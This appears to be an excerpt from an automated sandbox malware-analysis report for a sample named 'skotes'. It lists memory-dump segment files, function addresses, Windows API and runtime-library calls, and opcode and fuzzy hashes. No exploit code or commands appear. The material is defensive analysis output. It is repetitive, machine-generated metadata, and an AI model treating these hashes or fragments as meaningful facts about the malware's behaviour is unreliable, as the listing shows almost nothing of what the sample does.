Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 42bf1dada02ff81628cddc0c368775453b92a7edb894108cf768b02bd79f4120
Instruction ID: de7240cabbb2d0c932720d0d48d5c6e09e722d5db17eff2c819e452edc3ffb4e
Opcode Fuzzy Hash: 42bf1dada02ff81628cddc0c368775453b92a7edb894108cf768b02bd79f4120
Instruction Fuzzy Hash: 47E06D3614622696EB313AA58D41B6BA64C9B823B0F1D1620AD29963D5EB25DC0083E4

Function 00991775 Relevance: 1.5, APIs: 1, Instructions: 16fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,00991B65,?,?,00000000,?,00991B65,00000000,0000000C), ref: 00991792

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e61a1b3418fbd277dedb7d693318a267303e8bd4cb5f3f670eea736c7ac89c24
Instruction ID: 644614c7aaf0ae7a01b3be2a975fa0c20a371ee038288cd1429fc205114c07c8
Opcode Fuzzy Hash: e61a1b3418fbd277dedb7d693318a267303e8bd4cb5f3f670eea736c7ac89c24
Instruction Fuzzy Hash: 01D0923214010DBBEF129E84DC06EDE3BAAFB48714F015100BE1866060C772E832EB94

Function 00966C70 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00966CF5

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 51fa8d444db4c36888f7f4f4f2e04d935d81219e713fabf19c58519b7f406b21
Instruction ID: 55680288f75be51827ad01abc93976e79d68ec146edd407f74b6fccbd20b2670
Opcode Fuzzy Hash: 51fa8d444db4c36888f7f4f4f2e04d935d81219e713fabf19c58519b7f406b21
Instruction Fuzzy Hash: C5F0D171A14610ABC601BBA8CE02B0EBB74EB87B74F800758E821672D2DA341A0447D2

Function 0501050D Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2966197397.0000000005010000.00000040.00001000.00020000.00000000.sdmp, Offset: 05010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5010000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d276bcee000b61c1e3867238f16838b9c5ac7522bfdd90d7a700b5c000e514b
Instruction ID: 7f40fdd9ac425497dc37f6f0af3db20d7f793eafd3b9dea729cb9377d1a95cd3
Opcode Fuzzy Hash: 1d276bcee000b61c1e3867238f16838b9c5ac7522bfdd90d7a700b5c000e514b
Instruction Fuzzy Hash: 7A01A2AB04D210EE628295867B6D6FFAA1FF3D76343304126FC87C6942A2D50BDD543B

Function 050104F4 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2966197397.0000000005010000.00000040.00001000.00020000.00000000.sdmp, Offset: 05010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5010000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1b39615a44f1f12f0400d00bbff74242d8588109e2e4933ecdde42617732857
Instruction ID: ee6b9e2161e0fe6e8b68187586177542bdf042e5c17fd4d59fc7ec9c7bdd5e2a
Opcode Fuzzy Hash: b1b39615a44f1f12f0400d00bbff74242d8588109e2e4933ecdde42617732857
Instruction Fuzzy Hash: 59014FEB04D220FE628295467BAD5FFAA1BF3D72343304526FC8785542A2D50BDD103B

Function 050104FD Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2966197397.0000000005010000.00000040.00001000.00020000.00000000.sdmp, Offset: 05010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5010000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c057fa739ad80556bd348f6a06277200aaa7654f0db76a9f87186da96e54e56e
Instruction ID: d1777f6cfda720117c393e47996d82248491d2537d30f4f4e0016ab1bd59f9d5
Opcode Fuzzy Hash: c057fa739ad80556bd348f6a06277200aaa7654f0db76a9f87186da96e54e56e
Instruction Fuzzy Hash: 8801B1AB049214EFA28295417BAC5FFBA2BF7D7630330452AF88385542A2D507DD513B

Function 05010516 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2966197397.0000000005010000.00000040.00001000.00020000.00000000.sdmp, Offset: 05010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5010000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c71582304c79318aa3c00f77210dc90d6f173fc12acbb99ca4a9a080cca379dc
Instruction ID: a3f0a510d73ce32b494a126eb88d39e787280cf00eaddf6945b86c082d868251
Opcode Fuzzy Hash: c71582304c79318aa3c00f77210dc90d6f173fc12acbb99ca4a9a080cca379dc
Instruction Fuzzy Hash: 1D018FAB059210FEA18296467B6C5FFAA2BF3D72343304526F883C5542A6D507DD153A

Non-executed Functions

Function 00970E13 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 284COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00970F16
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00970F62

Part of subcall function 0097265D: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 00972750

Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00970FCE
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00970FEA
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 0097103E
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 0097106B
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 009710C1

Strings

(, xrefs: 00970F22

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
String ID: (
API String ID: 2943730970-3887548279
Opcode ID: 929b3736a5c0b39ae4048af37d94edba59fed1ab337fff7d79e9c2bdb6008b90
Instruction ID: 72ced27d413a837adee3b27c3ecd30da90dc1caae80e8764f331f7739dd243dc
Opcode Fuzzy Hash: 929b3736a5c0b39ae4048af37d94edba59fed1ab337fff7d79e9c2bdb6008b90
Instruction Fuzzy Hash: CEB15C72A14615EFDB28CF58D991B7EB7B4FF84310F15816EE909AB251D730AD80CB90

Function 00971602 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00972CFC: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00972D0F

Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 00971614

Part of subcall function 00972E0F: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 00972E39
Part of subcall function 00972E0F: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 00972EA8

Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 00971746
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 009717A6
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 009717B2
Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 009717ED
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 0097180E
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 0097181A
Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 00971823
Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 0097183B

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

